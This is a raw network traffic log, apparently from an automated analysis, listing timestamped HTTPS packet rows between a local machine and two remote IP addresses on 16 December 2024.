                                                                                                                                                Dec 16, 2024 09:54:32.320017099 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.320070982 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.320075989 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.320079088 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.320112944 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.320139885 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.356774092 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.356784105 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.356797934 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.356811047 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.356857061 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.356898069 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.356910944 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.462969065 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.468058109 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.468075037 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.468135118 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.468142033 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.468153000 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.468175888 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.468178988 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.468187094 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.468214989 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.468252897 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.495465994 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.495477915 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.495522976 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.495532036 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.495551109 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.495558977 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.495616913 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.513853073 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.513864040 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.513914108 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.513962030 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.513997078 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.513997078 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.514023066 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.514328003 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.527858973 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.527878046 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.527921915 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.527940989 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.528045893 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.528045893 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.540806055 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.540824890 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.540875912 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.540903091 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.541013002 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.553410053 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.553431988 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.553574085 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.553589106 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.553772926 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.663916111 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.663944006 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.664011955 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.664024115 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.664103985 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.664103985 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.676189899 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.676208973 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.676279068 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.676285982 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.676369905 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.687328100 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.687350988 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.687391043 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.687398911 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.687454939 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.687454939 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.697460890 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.697479010 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.697518110 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.697525024 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.697561026 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.708570957 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.708586931 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.708676100 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.708683014 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.708736897 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.715687990 CET49734443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:32.715759039 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.715837002 CET49734443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:32.716419935 CET49734443192.168.2.1220.198.119.84
                                                                                                                                                Dec 16, 2024 09:54:32.716447115 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.718194962 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.718213081 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.718314886 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.718331099 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.718620062 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.729362011 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.729381084 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.729464054 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.729475975 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.729595900 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.739644051 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.739661932 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.739866018 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.739873886 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.740159988 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.852786064 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.852811098 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.853064060 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.853064060 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.853092909 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.853171110 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.861442089 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.861462116 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.861520052 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.861527920 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.862065077 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.869735956 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.869755030 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.869827032 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.869837046 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.870034933 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.887115955 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.887135029 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.887200117 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.887207031 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.887295961 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.894197941 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.894215107 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.894279003 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.894288063 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.894346952 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.902143955 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.902163982 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.902287960 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.902287960 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.902297974 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.902391911 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.910248041 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.910260916 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.910315990 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.910322905 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.910341024 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.910511017 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.917378902 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.917397022 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.917454004 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.917460918 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:32.917489052 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:32.917521000 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.045125008 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.045150042 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.045406103 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.045406103 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.045428038 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.045622110 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.053072929 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.053092957 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.053179979 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.053191900 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.055557013 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.059844017 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.059861898 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.059937000 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.059946060 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.060075045 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.060137987 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.078428984 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.078448057 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.078511953 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.078521967 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.078663111 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.086183071 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.086203098 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.086296082 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.086307049 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.088586092 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.094481945 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.094501019 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.094604015 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.094613075 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.096551895 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.100912094 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.100933075 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.101006031 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.101013899 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.104542017 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.109313011 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.109338999 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.109457970 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.109467030 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.111699104 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.191134930 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.237076998 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.237102985 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.237368107 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.237385035 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.239586115 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.244929075 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.244959116 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.245090961 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.245090961 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.245116949 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.248559952 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.252770901 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.252804041 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.252901077 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.252912045 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.254605055 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.270562887 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.270592928 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.270731926 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.270731926 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.270754099 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.271097898 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.278476954 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.278510094 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.278600931 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.278618097 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.278706074 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.286173105 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.286220074 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.286338091 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.286338091 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.286350965 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.286632061 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.294049025 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.294075012 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.294151068 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.294158936 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.294536114 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.301368952 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.301399946 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.301484108 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.301484108 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.301492929 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.303564072 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.363759995 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.430237055 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.430274010 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.430509090 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.430509090 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.430537939 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.434551001 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.438028097 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.438057899 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.438164949 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.438164949 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.438180923 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.439552069 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.445959091 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.445997000 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.446078062 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.446090937 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.446228981 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.446228981 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.463110924 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.463145971 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.463342905 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.463373899 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.463668108 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.470952034 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.470984936 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.471023083 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.471045017 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.471065998 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.472629070 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.478698015 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.478727102 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.478818893 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.478848934 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.478874922 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.479274035 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.485553980 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.485579967 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.485649109 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.485665083 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.485729933 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.485729933 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.493278027 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.493314028 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.493377924 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.493388891 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.493460894 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.496640921 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.602267981 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.622077942 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.622103930 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.622262955 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.622262955 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.622282028 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.622586966 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.629549980 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.629579067 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.629708052 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.629728079 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.629981041 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.637726068 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.637743950 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.637824059 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.637834072 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.637900114 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.649810076 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.649904013 CET4434973345.125.67.168192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:33.649967909 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.650046110 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.716464996 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:33.835025072 CET49733443192.168.2.1245.125.67.168
                                                                                                                                                Dec 16, 2024 09:54:34.942038059 CET4434973420.198.119.84192.168.2.12
                                                                                                                                                Dec 16, 2024 09:54:34.942109108 CET49734443192.168.2.1220.198.119.84
